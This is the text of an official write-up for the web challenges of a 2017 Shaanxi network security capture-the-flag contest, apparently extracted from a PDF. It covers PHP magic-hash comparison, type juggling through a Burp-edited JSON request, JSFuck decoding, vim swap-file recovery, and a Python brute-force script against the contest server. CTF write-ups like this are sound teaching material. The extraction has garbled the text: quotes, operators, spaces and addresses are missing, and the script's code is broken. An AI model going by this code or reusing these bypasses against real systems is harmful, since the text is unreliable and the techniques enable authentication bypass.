2017 年(第三届)陕西省网络空间安全技术大赛线上赛官方writeup.pdf

2017年(第三届)陕西省网络空间安全技术大赛 线上赛官方Writeup 主办单位：陕西省兵工学会 承办单位：西安工业大学 协办单位：西安胡门网络技术有限公司 WEB部分 签到题 50 题目链接：5:84/ 首先查看网页源代码，发现是白盒审计： md5(240610708)//0e462097431906509019562988736854. md5(QNKCDZO)//0e830400451993494058024219903391 可以看到，这两个字符串一个只包含数字，一个只包含字母，虽 然两个的哈希不一样，但是都是一个形式：0e 纯数字这种格式的字 符串在判断相等的时候会被认为是科学计数法的数字，先做字符串到 数字的转换。 转换后都成为了0的好多好多次方，都是0，相等。因此 md5(240610708) md5(QNKCDZO); 网络空间安全技术大赛 / 提交后，会出现一个超链接： 接着查看网页源代码： php的json_decode()函数会根据json数据中的数据类型来将其 转换为php中的相应类型的数据。网页中的表单可能限制了所有的 输入都是string，即使输入数字，传入的东西也是 {key:0} 这是一个字符串0，我们需要让他为数字类型，用burp拦截，把两 个双引号去掉，变成这样： {key:0} 网络空间安全技术大赛 / 得到flag。 抽抽奖 75 Jsfuck 还有aaencode 的编码，解码得到flag。 继续抽 100 脚本如下 import requests import re import hashlib proxies {http::8080} defmd5(str): m hashlib.md5() m.update(str) returnm.hexdigest() defencode(str): output foriinstr: charCode ord(i) 网络空间安全技术大赛 / if(128charCode): charCode+ 128 elif(127charCode): charCode- 128 charCode 255-charCode hexCode hex(charCode).replace(0x，) if(2len(hexCode)): hexCode 0+hexCode output+ hexCode returnoutput index_url 5:81/index.php; get_url 5:81/get.php; token_url 5:81/token.php; s requests.Session() r s.get(index_url) token re.findall(rvalue \(.*)\hidden， r.text)[0] foriinrange(1，300): id encode(md5(str(i))) r s.get(get_url+?token +token+id +id) #print r.text result re.findall(:\(.*)\，r.text)[0] print result.decode(unicode-escape) flag re.findall(flag{，result) if(flag): break token s.get(token_url).text.replace(\，) Wrong 125 本题存在.index.php.swp的备份文件，在kali下执行 vim -r “index.php.swp”，修复文件，得到源码。 ?php error_repor